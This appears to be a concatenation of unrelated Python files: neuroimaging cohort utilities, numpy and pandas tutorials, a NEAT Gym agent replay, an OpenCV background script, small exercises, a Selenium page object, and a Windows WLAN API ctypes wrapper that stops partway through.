json.dump(env, f)
print('Saved in ', env_file)
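# Example env_file structure used by the functions in this module (added illustration;
# the names and paths are hypothetical):
# {
#     "working_path": "/home/user/study",
#     "cohorts": {
#         "demo": {
#             "path": "/home/user/db", "centers": "center1",
#             "acquisition": "default_acquisition", "analysis": "default_analysis",
#             "graph_v": "3.1", "ngraph_v": "3.1", "session": "session1",
#             "exclusion": []
#         }
#     },
#     "composed_cohorts": {"demo_plus": {"cohort": {"demo": {"indexes": [0, 1, 2]}}}}
# }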
def change_path_cohort(cohort_file, new_path, start, end, path_to_save, save):
""" Modify the path of attributes of all subjects in the cohort
"""
with open(cohort_file, 'r') as f:
cohort = json.load(f)
for sbj in cohort['subjects']:
sbj['t1'] = sbj['t1'][:start] + new_path + sbj['t1'][end:]
sbj['roots'] = sbj['roots'][:start] + new_path + sbj['roots'][end:]
sbj['skeleton'] = sbj['skeleton'][:start] + new_path + sbj['skeleton'][end:]
sbj['graph'] = sbj['graph'][:start] + new_path + sbj['graph'][end:]
if sbj['notcut_graph'] != -1:
sbj['notcut_graph'] = sbj['notcut_graph'][:start] + new_path + sbj['notcut_graph'][end:]
print(cohort['subjects'][0]['t1'])
print(cohort['subjects'][0]['roots'])
print(cohort['subjects'][0]['skeleton'])
print(cohort['subjects'][0]['graph'])
print(cohort['subjects'][0]['notcut_graph'])
if save:
with open(path_to_save, 'w') as f:
json.dump(cohort, f)
        print('cohort saved')
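# Example call (added illustration; the paths and character offsets are hypothetical):
# change_path_cohort('cohorts/cohort-demo_hemi-L.json', '/new/database/root',
#                    start=0, end=18,
#                    path_to_save='cohorts/cohort-demo_hemi-L.json', save=False)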
def create_short_cohort(path_to_cohort, n_sbj, order, save, new_name=None):
""" Create cohort with n_sbj subjects from a full cohort
"""
with open(path_to_cohort, 'r') as f:
        cohort = json.load(f)
    new_cohort = cohort.copy()
    if order:
        new_cohort['subjects'] = cohort['subjects'][:n_sbj]
    else:
        new_cohort['subjects'] = random.sample(cohort['subjects'], k=n_sbj)
if new_name is None:
new_cohort['name'] = cohort['name'][:-7] + '_short' + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + '_short' + path_to_cohort[-12:]
else:
new_cohort['name'] = cohort['name'][:-7] + new_name + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + new_name + path_to_cohort[-12:]
if save:
with open(new_path, 'w') as f:
json.dump(new_cohort, f)
print('cohort saved:', new_path)
return new_cohort
def select_subjects_from_cohort(path_to_cohort, sbj, save, new_name=None):
""" Create cohort with subjects in sbj from the cohort
"""
with open(path_to_cohort, 'r') as f:
cohort = json.load(f)
new_cohort = cohort.copy()
new_cohort['subjects'] = []
for s in cohort['subjects']:
if s['name'] in sbj:
new_cohort['subjects'].append(s)
else:
print(s['name'])
if new_name is None:
new_cohort['name'] = cohort['name'][:-7] + '_short' + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + '_short' + path_to_cohort[-12:]
else:
new_cohort['name'] = cohort['name'][:-7] + new_name + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + new_name + path_to_cohort[-12:]
if save:
with open(new_path, 'w') as f:
json.dump(new_cohort, f)
print('cohort saved:', new_path)
return new_cohort
def create_cohort(env_file, name_cohort):
""" Create cohort called named_cohort from env_file, do not take in account subjects without the good files
"""
with open(env_file, 'r') as f:
param = json.load(f)
db_dir = param["cohorts"][name_cohort]['path']
acquisition = param["cohorts"][name_cohort]['acquisition']
center = param["cohorts"][name_cohort]['centers']
analysis = param["cohorts"][name_cohort]['analysis']
    graph_v = param["cohorts"][name_cohort]['graph_v']
ngraph_v = param["cohorts"][name_cohort]['ngraph_v']
session = param["cohorts"][name_cohort]['session']
working_path = param["working_path"]
path = os.path.join(db_dir, center)
for hemi in ['L', 'R']:
cohort = {'name': name_cohort+'_hemi-'+hemi, 'subjects': []}
for s in os.listdir(path):
if s[-4:] != "minf" and s[-4:] != "html":
to_add = True
name = s
# T1
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii")):
t1 = op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii")
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz")):
t1 = op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz")
else:
to_add = False
print(name, 'No T1')
# Roots
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii')):
roots = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii')
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii.gz')):
roots = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii.gz')
else:
to_add = False
print(name, 'No roots')
# Skeleton
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii')):
skeleton = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii')
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz')):
skeleton = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz')
else:
to_add = False
print(name, 'No skeleton')
# Graph
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')):
graph = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')
else:
to_add = False
print(name, 'No graph')
# Not cut graph
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')):
notcut_graph = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')
else:
if ngraph_v != -1:
to_add = False
print(name, 'No not cut graph')
else:
notcut_graph = None
if to_add:
dico_sbj = {'name': name,
't1': t1,
'roots': roots,
'skeleton': skeleton,
'graph': graph,
'notcut_graph': notcut_graph}
cohort['subjects'].append(dico_sbj)
print('subject', name, 'added')
print('Cohort: ', name_cohort)
print('Hemi: ', hemi)
        print('Number of subjects: ', len(cohort['subjects']), '\n')
with open(op.join(working_path, 'cohorts', 'cohort-'+name_cohort+'_hemi-'+hemi+'.json'), 'w') as f:
json.dump(cohort, f)
print('File saved :' + 'cohort-'+name_cohort+'_hemi-'+hemi+'.json\n')
def create_composed_cohort(env_file, name_cohort):
""" Create cohort called named cohort from different cohorts, sum up in the env_file
"""
with open(env_file, 'r') as f:
param = json.load(f)
working_path = param["working_path"]
for hemi in ['L', 'R']:
cohort = {'name': name_cohort + '_hemi-' + hemi, 'subjects': []}
for n, v in param["composed_cohorts"][name_cohort]["cohort"].items():
with open(op.join(working_path, 'cohorts', 'cohort-'+n+'_hemi-'+hemi+'.json'), 'r') as f:
c = json.load(f)
subjects = c['subjects']
if 'indexes' in v.keys():
for i in v['indexes']:
cohort['subjects'].append(subjects[i])
else:
cohort['subjects'] += subjects
print('\nCohort: ', name_cohort)
print('Hemi: ', hemi)
        print('Number of subjects: ', len(cohort['subjects']))
with open(op.join(working_path, 'cohorts', 'cohort-' + name_cohort + '_hemi-' + hemi + '.json'), 'w') as f:
json.dump(cohort, f)
print('File saved : ', op.join(working_path, 'cohorts', 'cohort-' + name_cohort + '_hemi-' + hemi + '.json'))
|
import numpy as np
# CRUD (append, update, delete, search, sort)
data = np.array([1, 2, 3, 4, 5, 6])
print(data)
# Append
data = np.append(data, [7, 8])
print(data)
# Insert in the middle
data = np.insert(data, 1, [9, 10])
print(data)
# Update
data[0] = 100
print(data)
# Update via slicing
data[1:3] = (22, 33)
print(data)
data[3:5] = data[5:6]
print(data)
index = data > 4
data[index] = data[index] + 2
# Delete
data = np.delete(data, 1)
print(data)
# When deleting a range, use np.s_ to specify the slice
# Writing the index as a bare slice like [2:] is a syntax error
data = np.delete(data, np.s_[2:])
# data = np.delete(data, slice(2, len(data)))
print(data)
# Search
data1 = np.array([10, 20, 30, 40, 50])
search_result_index = np.where(data1 >= 40)
print(search_result_index)
print(data1[search_result_index])
# Delete the numbers smaller than 30
data1 = np.array([10, 20, 30, 40, 50])
search_result_index = np.where(data1 < 30)
data1 = np.delete(data1, search_result_index)
print(data1)
# Sort
# Ascending order
data2 = np.array([10, 200, 30, 40, 50])
print(np.sort(data2))
# Descending order
data2 = np.sort(data2)
print(data2[-1::-1])
print(np.sort(data2)[-1::-1])
# With a negative step, the start index defaults to -1 (the last element)
print(np.sort(data2)[::-1])
# Extract the indices produced by sorting
# np.argsort returns the pre-sort index values in the order the elements would appear after sorting
data2 = np.array([10, 200, 30, 40, 50])
# Result: [0 2 3 4 1]
print(np.argsort(data2))
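# Added illustration: the index array from np.argsort can be used directly as a
# fancy index to produce the sorted array.
print(data2[np.argsort(data2)])  # [ 10  30  40  50 200]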
|
import pandas as pd
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
df_all_states=pd.read_csv('E:\csvdhf5xlsxurlallfiles/2008_all_states.csv')
print(df_all_states.columns)
_=plt.plot(df_all_states['total_votes']/1000, df_all_states['dem_share'], marker='.', linestyle='none')
_=plt.xlabel('total votes (thousands)')
_=plt.ylabel('percent of vote for Obama')
plt.show()
# covariance - a measure of how quantities vary together: cov = 1/n * sum((Xi - Xmean) * (Yi - Ymean))
# r = correlation = covariance / ((std of x) * (std of y))
covariance_matrix = np.cov(df_all_states['total_votes'], df_all_states['dem_share'])
print(covariance_matrix)
cov = covariance_matrix[0, 1]
print(cov)
def pearson_r(x,y):
    corr_mat = np.corrcoef(x, y)
return corr_mat[0,1]
r=pearson_r(df_all_states['total_votes'], df_all_states['dem_share'])
print(r)
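# Added illustration: the same Pearson r can be computed directly from the covariance
# definition in the comments above; np.corrcoef is just this normalized ratio.
x = df_all_states['total_votes']
y = df_all_states['dem_share']
r_manual = np.cov(x, y)[0, 1] / (np.std(x, ddof=1) * np.std(y, ddof=1))
print(r_manual)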
|
import gym
import torch
import DeepNEAT.NEAT_implementation.Population.population as population
import DeepNEAT.configurations.TimePilot.timePilot as config
#import DeepNEAT.configurations.Freeway.freeway as config
#import DeepNEAT.configurations.SpaceInvaders.spaceInvaders as config
from DeepNEAT.NEAT_implementation.Phenotype.feedForwardNetwork import FeedForwardNetwork
import time
from DeepNEAT.visualization.Visualization import draw_net
from DeepNEAT.NEAT_implementation.Genotype.genome import Genome
configuration = config.TimePilotConfig()
#configuration = config.FreewayConfig()
#configuration = config.SpaceInvadersConfig()
# OpenAI Gym
env = gym.make('TimePilot-ram-v0')
#env = gym.make('Freeway-ram-v0')
#env = gym.make('SpaceInvaders-ram-v0')
done = False
observation = env.reset()
fitness = 0
solution = torch.load("./Results/TimePilot/TimePilot_11")
#solution = torch.load("./Results/Freeway/Freeway_14")
#solution = torch.load("./Results/SpaceInvaders/SpaceInvaders_11")
phenotype = FeedForwardNetwork(solution, config.TimePilotConfig)
#phenotype = FeedForwardNetwork(solution, config.FreewayConfig)
#phenotype = FeedForwardNetwork(solution, config.SpaceInvadersConfig)
while not done:
env.render()
input = torch.Tensor([observation]).to(config.TimePilotConfig.DEVICE)
#input = torch.Tensor([observation]).to(config.FreewayConfig.DEVICE)
#input = torch.Tensor([observation]).to(config.SpaceInvadersConfig.DEVICE)
pred = torch.argmax(phenotype(input)[0]).numpy()
observation, reward, done, info = env.step(pred)
fitness += reward
print(fitness)
env.close()
|
from __future__ import print_function
import sys
import json
import cv2
import numpy as np
import matplotlib.pyplot as plt
def median_background(params):
input_video = params['input_video']
cap = cv2.VideoCapture(input_video)
cnt = 0
frame_list = []
while cap.isOpened():
ret, frame_bgr = cap.read()
if not ret:
break
frame_gry = cv2.cvtColor(frame_bgr,cv2.COLOR_BGR2GRAY)
# Select Region of interest
c0,c1 = params['roi_cols']
r0,r1 = params['roi_rows']
frame_gry = frame_gry[r0:r1,c0:c1]
if cnt%params['background_frame_skip'] == 0:
frame_list.append(frame_gry)
cv2.imshow('frame', frame_gry)
if cnt == 0 and params['background_check_roi']:
print()
print("Does ROI look ok? press q to quit and adjust or press any key to continue")
wait_val = 0
else:
wait_val = 1
if cv2.waitKey(wait_val) & 0xff == ord('q'):
cap.release()
cv2.destroyAllWindows()
sys.exit(0)
print('frame: {0}'.format(cnt))
cnt+=1
cap.release()
    frame_array = np.array(frame_list)
    frame_med = np.median(frame_array, 0)
    frame_med = frame_med.astype(np.uint8)
cv2.imshow('median',frame_med)
cv2.waitKey(0)
output_file = params['background_file']
cv2.imwrite(output_file,frame_med)
cv2.destroyAllWindows()
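# Example parameter file consumed by median_background (added illustration;
# the file names and numbers are hypothetical):
# {
#     "input_video": "arena.avi",
#     "roi_cols": [100, 540],
#     "roi_rows": [60, 420],
#     "background_frame_skip": 10,
#     "background_check_roi": true,
#     "background_file": "background.png"
# }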
# -----------------------------------------------------------------------------
if __name__ == '__main__':
# Testing
params_file = sys.argv[1]
with open(params_file,'r') as f:
params = json.load(f)
median_background(params)
|
num = int(input())
for x in range(1,num+1):
if num%x==0:
print("Divisor: " + str(x))
|
import html
from data import get_questions
from question_model import Question
from quiz_brain import QuizBrain
difficulty = input("Choose your level(easy/medium/hard): ")
question_data = get_questions(difficulty)
question_bank = [Question(text=html.unescape(q['question']), answer=q['correct_answer']) for q in question_data]
host = QuizBrain(question_bank)
while host.questions_left():
host.next_question()
print("\n")
print("You've completed the quiz!")
print(f"Your final score was {host.score}/{host.question_number}")
|
from time import sleep
from selenium.common.exceptions import NoSuchElementException
from pages.base_page import BasePage
from pom.utils import wait_loop
class DashboardPage(BasePage):
def __init__(self):
BasePage.__init__(self)
def open_campaigns_page(self):
element = self.driver.find_element_by_xpath("//div[@class='nav main']//a[contains(@href,'campaigns')]"
"//div[@class='content']")
element.click()
def click_button_create_campaign(self):
button = self.driver.find_element_by_xpath("//div[@class='header-wrapper']"
"//button[@class='lp-button color-primary normal enabled']")
element = wait_loop(condition=lambda: button, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
button.click()
sleep(4)
def verify_open_page(self, expected: str):
element = wait_loop(condition=lambda: self.driver.find_element_by_xpath("//div[@class='placeholder-pane-text']")
, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
actual = element.text
assert actual == expected
def change_text(self):
element = self.driver.find_element_by_xpath("//div[@class='campaign-name-box']//div[@class='name']")
element.click()
element = self.driver.find_element_by_css_selector("input.lp-wrapped-text-input-field")
element.click()
element.clear()
element.send_keys("New Campaign Test")
button = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='Save']")
button.click()
def set_goal(self):
element = self.driver.find_element_by_xpath("//div[@class='options']//p[text()='Onboard']")
element = wait_loop(condition=lambda: element, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
element.click()
def press_on_tab(self, tab_name: str):
element = self.driver.find_element_by_xpath("//div[@class='tab']//span[text()='" + tab_name + "']").click()
return element
def set_scheduled(self, option: str):
element = self.driver.find_element_by_xpath("//div[@class='options']//p[text()='" + option + "']")
sleep(2)
element.click()
element = self.driver.find_element_by_xpath("//div[@class='date-time']//i[@class='lp-icon']")
element = wait_loop(condition=lambda: element, timeout_seconds=10)
if not element:
raise NoSuchElementException("No")
element.click()
sleep(3)
element = self.driver.find_element_by_xpath("//div[@class='lp-calendar-week']//div[@class='lp-day']"
"//span[text()='8']")
element.click()
def set_push_notifications(self):
element = self.driver.find_element_by_xpath("//div[@class='composer-actions-kind-item']"
"//span[text()='Push Notification']")
sleep(2)
element.click()
element = self.driver.find_element_by_xpath("//div[@class='text-field-view']//input")
element.click()
element.clear()
element.send_keys("test")
def click_button_to_start_campaign(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
sleep(2)
element.click()
def click_start_modal_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
element.click()
def click_end_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
sleep(2)
element.click()
def click_end_modal_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//div[@class='footer']//span[text()='" + button_name + "']")
element.click()
def verify_state(self, expected_state: str):
sleep(2)
actual = self.driver.find_element_by_xpath("//div[@class='navigation-bar-controls']//span").text
assert actual == expected_state, f'Actual state is: {actual} but expected is: {expected_state}'
def close_browser(self):
self.driver.quit()
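# pom.utils.wait_loop is not shown in this repository; a minimal sketch of the
# polling helper this page object assumes: the condition callable is retried
# until it returns a truthy value or the timeout expires, otherwise None.
import time

def wait_loop(condition, timeout_seconds=10, poll_seconds=0.5):
    end = time.time() + timeout_seconds
    while time.time() < end:
        try:
            result = condition()
            if result:
                return result
        except NoSuchElementException:
            pass  # element not present yet, keep polling
        time.sleep(poll_seconds)
    return None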
|
""" wlan_api.py - Windows Wlan Native API interface module """
import binascii
import re
import xml.etree.ElementTree as ET
from ctypes import *
from ctypes.wintypes import *
from xml_util import xmlString
from common import hexDump
from tl_logger import TLLog,logOptions
log = TLLog.getLogger( 'wlan' )
class WlanException(Exception):
pass
def customresize(array, new_size):
return (array._type_*new_size).from_address(addressof(array))
wlanapi = windll.LoadLibrary('wlanapi.dll')
ERROR_SUCCESS = 0
class GUID(Structure):
_fields_ = [
('Data1', c_ulong),
('Data2', c_ushort),
('Data3', c_ushort),
('Data4', c_ubyte*8),
]
WLAN_INTERFACE_STATE = c_uint
(wlan_interface_state_not_ready,
wlan_interface_state_connected,
wlan_interface_state_ad_hoc_network_formed,
wlan_interface_state_disconnecting,
wlan_interface_state_disconnected,
wlan_interface_state_associating,
wlan_interface_state_discovering,
wlan_interface_state_authenticating) = map(WLAN_INTERFACE_STATE, xrange(0, 8))
dctWlanInterfaceStates = {
0 : 'not ready',
1 : 'connected',
2 : 'ad_hoc_network_formed',
3 : 'disconnecting',
4 : 'disconnected',
5 : 'associating',
6 : 'discovering',
7 : 'authenticating',
}
class WLAN_INTERFACE_INFO(Structure):
_fields_ = [
("InterfaceGuid", GUID),
("strInterfaceDescription", c_wchar * 256),
("isState", WLAN_INTERFACE_STATE)
]
def desc(self):
return self.strInterfaceDescription
def miniDesc(self):
lst = self.strInterfaceDescription.split()
return lst[0]
def shortDesc(self):
lst = self.strInterfaceDescription.split()
if len(lst) == 0:
desc = ''
elif len(lst) == 1:
desc = lst[0]
else:
desc = lst[0] + ' ' + lst[1]
return desc[0:20]
def getState(self):
return dctWlanInterfaceStates[self.isState]
def log(self):
log.debug( 'desc:%s state:%s' % (self.desc(),self.getState()))
def __str__(self):
return self.shortDesc()
class WLAN_INTERFACE_INFO_LIST(Structure):
_fields_ = [
("NumberOfItems", DWORD),
("Index", DWORD),
("InterfaceInfo", WLAN_INTERFACE_INFO * 1)
]
WLAN_MAX_PHY_TYPE_NUMBER = 0x8
DOT11_SSID_MAX_LENGTH = 32
WLAN_REASON_CODE = DWORD
DOT11_BSS_TYPE = c_uint
(dot11_BSS_type_infrastructure,
dot11_BSS_type_independent,
dot11_BSS_type_any) = map(DOT11_BSS_TYPE, xrange(1, 4))
DOT11_PHY_TYPE = c_uint
dot11_phy_type_unknown = 0
dot11_phy_type_any = 0
dot11_phy_type_fhss = 1
dot11_phy_type_dsss = 2
dot11_phy_type_irbaseband = 3
dot11_phy_type_ofdm = 4
dot11_phy_type_hrdsss = 5
dot11_phy_type_erp = 6
dot11_phy_type_ht = 7
dot11_phy_type_IHV_start = 0x80000000
dot11_phy_type_IHV_end = 0xffffffff
DOT11_AUTH_ALGORITHM = c_uint
DOT11_AUTH_ALGO_80211_OPEN = 1
DOT11_AUTH_ALGO_80211_SHARED_KEY = 2
DOT11_AUTH_ALGO_WPA = 3
DOT11_AUTH_ALGO_WPA_PSK = 4
DOT11_AUTH_ALGO_WPA_NONE = 5
DOT11_AUTH_ALGO_RSNA = 6
DOT11_AUTH_ALGO_RSNA_PSK = 7
DOT11_AUTH_ALGO_IHV_START = 0x80000000
DOT11_AUTH_ALGO_IHV_END = 0xffffffff
DOT11_CIPHER_ALGORITHM = c_uint
DOT11_CIPHER_ALGO_NONE = 0x00
DOT11_CIPHER_ALGO_WEP40 = 0x01
DOT11_CIPHER_ALGO_TKIP = 0x02
DOT11_CIPHER_ALGO_CCMP = 0x04
DOT11_CIPHER_ALGO_WEP104 = 0x05
DOT11_CIPHER_ALGO_WPA_USE_GROUP = 0x100
DOT11_CIPHER_ALGO_RSN_USE_GROUP = 0x100
DOT11_CIPHER_ALGO_WEP = 0x101
DOT11_CIPHER_ALGO_IHV_START = 0x80000000
DOT11_CIPHER_ALGO_IHV_END = 0xffffffff
WLAN_AVAILABLE_NETWORK_CONNECTED = 1
WLAN_AVAILABLE_NETWORK_HAS_PROFILE = 2
WLAN_AVAILABLE_NETWORK_INCLUDE_ALL_ADHOC_PROFILES = 0x00000001
WLAN_AVAILABLE_NETWORK_INCLUDE_ALL_MANUAL_HIDDEN_PROFILES = 0x00000002
class DOT11_SSID(Structure):
_fields_ = [
("SSIDLength", c_ulong),
("SSID", c_char * DOT11_SSID_MAX_LENGTH)
]
def __str__(self):
return self.SSID[0:self.SSIDLength]
class WLAN_AVAILABLE_NETWORK(Structure):
_fields_ = [
("ProfileName", c_wchar * 256),
("dot11Ssid", DOT11_SSID),
("dot11BssType", DOT11_BSS_TYPE),
("NumberOfBssids", c_ulong),
("NetworkConnectable", c_bool),
("wlanNotConnectableReason", WLAN_REASON_CODE),
("NumberOfPhyTypes", c_ulong),
("dot11PhyTypes", DOT11_PHY_TYPE * WLAN_MAX_PHY_TYPE_NUMBER),
("MorePhyTypes", c_bool),
("wlanSignalQuality", c_ulong),
("SecurityEnabled", c_bool),
("dot11DefaultAuthAlgorithm", DOT11_AUTH_ALGORITHM),
("dot11DefaultCipherAlgorithm", DOT11_CIPHER_ALGORITHM),
("Flags", DWORD),
("Reserved", DWORD)
]
def getProfileName(self):
return self.ProfileName
def getSSID(self):
return self.dot11Ssid
def getSignalQuality(self):
""" return signal quality """
return self.wlanSignalQuality
def getSignalQualityInDBM(self):
""" return signal quality in dbm.
wlanSignalQuality is percentage value that represents the signal quality of the network.
WLAN_SIGNAL_QUALITY is of type ULONG. This member contains a value between 0 and 100.
A value of 0 implies an actual RSSI signal strength of -100 dbm.
A value of 100 implies an actual RSSI signal strength of -50 dbm.
You can calculate the RSSI signal strength value for wlanSignalQuality values between 1 and 99
using linear interpolation."""
return (float(self.wlanSignalQuality) / 2.0) - 100.0
def isConnectable(self):
return self.NetworkConnectable
def isConnected(self):
return self.Flags & WLAN_AVAILABLE_NETWORK_CONNECTED
def hasProfile(self):
return self.Flags & WLAN_AVAILABLE_NETWORK_HAS_PROFILE
def isSecure(self):
return self.SecurityEnabled
def log(self):
log.debug( 'signal:%s (%f dbm)' % (self.getSignalQuality(),self.getSignalQualityInDBM()))
def __str__(self):
return 'ProfileName:%s ssid:%s bssType:%s' % (self.ProfileName,self.dot11Ssid,self.dot11BssType)
class WLAN_AVAILABLE_NETWORK_LIST(Structure):
_fields_ = [
("NumberOfItems", DWORD),
("Index", DWORD),
("Network", WLAN_AVAILABLE_NETWORK * 1),
]
WlanOpenHandle = wlanapi.WlanOpenHandle
WlanOpenHandle.argtypes = (DWORD, c_void_p, POINTER(DWORD), POINTER(HANDLE))
WlanOpenHandle.restype = DWORD
WlanCloseHandle = wlanapi.WlanCloseHandle
WlanCloseHandle.argtypes = (HANDLE,c_void_p)
WlanCloseHandle.restype = DWORD
WlanEnumInterfaces = wlanapi.WlanEnumInterfaces
WlanEnumInterfaces.argtypes = (HANDLE, c_void_p,
POINTER(POINTER(WLAN_INTERFACE_INFO_LIST)))
WlanEnumInterfaces.restype = DWORD
WlanGetAvailableNetworkList = wlanapi.WlanGetAvailableNetworkList
WlanGetAvailableNetworkList.argtypes = (HANDLE, POINTER(GUID), DWORD, c_void_p,
POINTER(POINTER(WLAN_AVAILABLE_NETWORK_LIST)))
WlanGetAvailableNetworkList.restype = DWORD
WlanFreeMemory = wlanapi.WlanFreeMemory
WlanFreeMemory.argtypes = [c_void_p]
WlanDisconnect = wlanapi.WlanDisconnect
WlanDisconnect.argtypes = (HANDLE, POINTER(GUID), c_void_p)
WlanDisconnect.restype = DWORD
WLAN_CONNECTION_MODE = c_ubyte
wlan_connection_mode_profile = 0
wlan_connection_mode_temporary_profile = 1
wlan_connection_mode_discovery_secure = 2
wlan_connection_mode_discovery_unsecure = 3
wlan_connection_mode_auto = 4
wlan_connection_mode_invalid = 5
class NDIS_OBJECT_HEADER(Structure):
"""
typedef struct _NDIS_OBJECT_HEADER {
UCHAR Type;
UCHAR Revision;
USHORT Size;
} NDIS_OBJECT_HEADER, *PNDIS_OBJECT_HEADER;
"""
_fields_ = [
("Type", c_ubyte),
("Revision", c_ubyte),
("Size", USHORT),
]
class DOT11_MAC_ADDRESS(Structure):
"""
typedef UCHAR DOT11_MAC_ADDRESS[6];
typedef DOT11_MAC_ADDRESS* PDOT11_MAC_ADDRESS;
"""
_fields_ = [
("macAddr", c_ubyte*6),
]
class DOT11_BSSID_LIST(Structure):
"""
typedef struct _DOT11_BSSID_LIST {
NDIS_OBJECT_HEADER Header;
ULONG uNumOfEntries;
ULONG uTotalNumOfEntries;
DOT11_MAC_ADDRESS BSSIDs[1];
} DOT11_BSSID_LIST, *PDOT11_BSSID_LIST;
"""
_fields_ = [
("Header", NDIS_OBJECT_HEADER),
("uNumOfEntries", ULONG),
("uTotalNumOfEntries", ULONG),
("BSSIDs", DOT11_MAC_ADDRESS * 1),
]
class WLAN_CONNECTION_PARAMETERS(Structure):
"""
typedef struct _WLAN_CONNECTION_PARAMETERS {
WLAN_CONNECTION_MODE wlanConnectionMode;
LPCWSTR strProfile;
PDOT11_SSID pDot11Ssid;
PDOT11_BSSID_LIST pDesiredBssidList;
DOT11_BSS_TYPE dot11BssType;
DWORD dwFlags;
} WLAN_CONNECTION_PARAMETERS, *PWLAN_CONNECTION_PARAMETERS;
"""
_fields_ = [
("wlanConnectionMode", WLAN_CONNECTION_MODE),
("strProfile", c_wchar_p),
("dot11Ssid", POINTER(DOT11_SSID)),
("desiredBssidList", POINTER(DOT11_BSSID_LIST)),
("dot11BssType", DOT11_BSS_TYPE),
("Flags", DWORD),
]
#DWORD WINAPI WlanConnect(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ const PWLAN_CONNECTION_PARAMETERS pConnectionParameters,
#_Reserved_ PVOID pReserved
#);
WlanConnect = wlanapi.WlanConnect
WlanConnect.argtypes = (HANDLE, POINTER(GUID), POINTER(WLAN_CONNECTION_PARAMETERS), c_void_p)
WlanConnect.restype = DWORD
#DWORD WINAPI WlanGetProfile(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ LPCWSTR strProfileName,
#_Reserved_ PVOID pReserved,
#_Out_ LPWSTR *pstrProfileXml,
#_Inout_opt_ DWORD *pdwFlags,
#_Out_opt_ PDWORD pdwGrantedAccess
#);
WlanGetProfile = wlanapi.WlanGetProfile
WlanGetProfile.argtypes = (HANDLE, POINTER(GUID), c_wchar_p, c_void_p, POINTER(c_wchar_p), POINTER(DWORD), POINTER(DWORD))
WlanGetProfile.restype = DWORD
WlanSetProfile = wlanapi.WlanSetProfile
WlanSetProfile.restype = DWORD # DWORD WINAPI WlanSetProfile(
WlanSetProfile.argtypes = (HANDLE, # _In_ HANDLE hClientHandle,
POINTER(GUID), # _In_ const GUID *pInterfaceGuid,
DWORD, # _In_ DWORD dwFlags,
c_wchar_p, # _In_ LPCWSTR strProfileXml,
c_wchar_p, # _In_opt_ LPCWSTR strAllUserProfileSecurity,
BOOL, # _In_ BOOL bOverwrite,
c_void_p, # _Reserved_ PVOID pReserved,
POINTER(DWORD) # _Out_ DWORD *pdwReasonCode
) #);
#DWORD WINAPI WlanDeleteProfile(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ LPCWSTR strProfileName,
#_Reserved_ PVOID pReserved
#);
WlanDeleteProfile = wlanapi.WlanDeleteProfile
WlanDeleteProfile.restype = DWORD
WlanDeleteProfile.argtypes = (HANDLE,
POINTER(GUID),
c_wchar_p,
c_void_p)
class WLAN_RAW_DATA(Structure):
"""
typedef struct _WLAN_RAW_DATA {
DWORD dwDataSize;
BYTE DataBlob[1];
} WLAN_RAW_DATA, *PWLAN_RAW_DATA;
"""
_fields_ = [
("dwDataSize", DWORD),
("DataBlob ", BYTE * 1),
]
#DWORD WINAPI WlanScan(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_opt_ const PDOT11_SSID pDot11Ssid,
#_In_opt_ const PWLAN_RAW_DATA pIeData,
#_Reserved_ PVOID pReserved
#);
WlanScan= wlanapi.WlanScan
WlanScan.restype = DWORD
WlanScan.argtypes = (HANDLE,
POINTER(GUID),
POINTER(DOT11_SSID),
POINTER(WLAN_RAW_DATA),
c_void_p)
#DWORD WlanReasonCodeToString(
#_In_ DWORD dwReasonCode,
#_In_ DWORD dwBufferSize,
#_In_ PWCHAR pStringBuffer,
#_Reserved_ PVOID pReserved
#);
WlanReasonCodeToString = wlanapi.WlanReasonCodeToString
WlanReasonCodeToString.restype = DWORD
WlanReasonCodeToString.argtypes = (DWORD,
                                   DWORD,
                                   c_wchar_p,
                                   c_void_p)
def getWlanReasonCodeString(reasonCode):
""" return the reason code string """
rcStr = ''
try:
buf = create_unicode_buffer(256)
bufSize = DWORD(256)
ret = WlanReasonCodeToString( reasonCode, bufSize, buf, None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
rcStr = buf.value
except Exception,err:
